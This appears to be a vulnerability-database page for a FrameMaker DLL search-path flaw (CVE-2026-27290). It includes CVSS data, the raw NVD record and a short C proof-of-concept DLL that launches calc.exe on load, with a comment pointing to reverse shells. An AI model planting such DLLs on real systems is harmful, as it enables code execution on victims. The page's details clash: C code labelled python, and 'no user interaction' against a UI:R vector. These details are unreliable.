Security Vulnerability Report
中文
CVE-2026-27290 CVSS 8.6 HIGH

CVE-2026-27290

Published: 2026-04-14 23:16:26
Last Modified: 2026-04-15 18:32:02
Source: [email protected]

Description

Adobe Framemaker versions 2022.8 and earlier are affected by an Untrusted Search Path vulnerability that might allow attackers to execute arbitrary code in the context of the current user. If the application uses a search path to locate critical resources such as programs, then an attacker could modify that search path to point to a malicious program, which the targeted application would then execute. Exploitation of this issue does not require user interaction.

CVSS Details

CVSS Score
8.6
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:adobe:framemaker:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:* - NOT VULNERABLE
Adobe FrameMaker <= 2022.8

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
/* * PoC for Untrusted Search Path Vulnerability (CVE-2026-27290) * Compile this code as a DLL (e.g., malicious.dll). * Place the DLL in the directory where the vulnerable application looks for resources first (e.g., current working directory). * When Adobe FrameMaker attempts to load the targeted DLL, it will load this malicious one instead. */ #include <windows.h> #include <stdlib.h> // DLL Entry Point BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved) { switch (ul_reason_for_call) { case DLL_PROCESS_ATTACH: // Code execution triggers when the DLL is loaded into the process // Example: Pop a calc.exe to demonstrate arbitrary code execution WinExec("calc.exe", SW_SHOW); // In a real attack scenario, this would be a reverse shell or payload download break; case DLL_THREAD_ATTACH: case DLL_THREAD_DETACH: case DLL_PROCESS_DETACH: break; } return TRUE; }

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-27290", "sourceIdentifier": "[email protected]", "published": "2026-04-14T23:16:25.813", "lastModified": "2026-04-15T18:32:01.843", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Adobe Framemaker versions 2022.8 and earlier are affected by an Untrusted Search Path vulnerability that might allow attackers to execute arbitrary code in the context of the current user. If the application uses a search path to locate critical resources such as programs, then an attacker could modify that search path to point to a malicious program, which the targeted application would then execute. Exploitation of this issue does not require user interaction."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H", "baseScore": 8.6, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 6.0}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-426"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:adobe:framemaker:*:*:*:*:*:*:*:*", "versionEndExcluding": "2022.9", "matchCriteriaId": "6943B816-3A7D-47BF-9E01-DF86C9332C19"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:*", "matchCriteriaId": "A2572D17-1DE6-457B-99CC-64AFD54487EA"}]}]}], "references": [{"url": "https://helpx.adobe.com/security/products/framemaker/apsb26-36.html", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.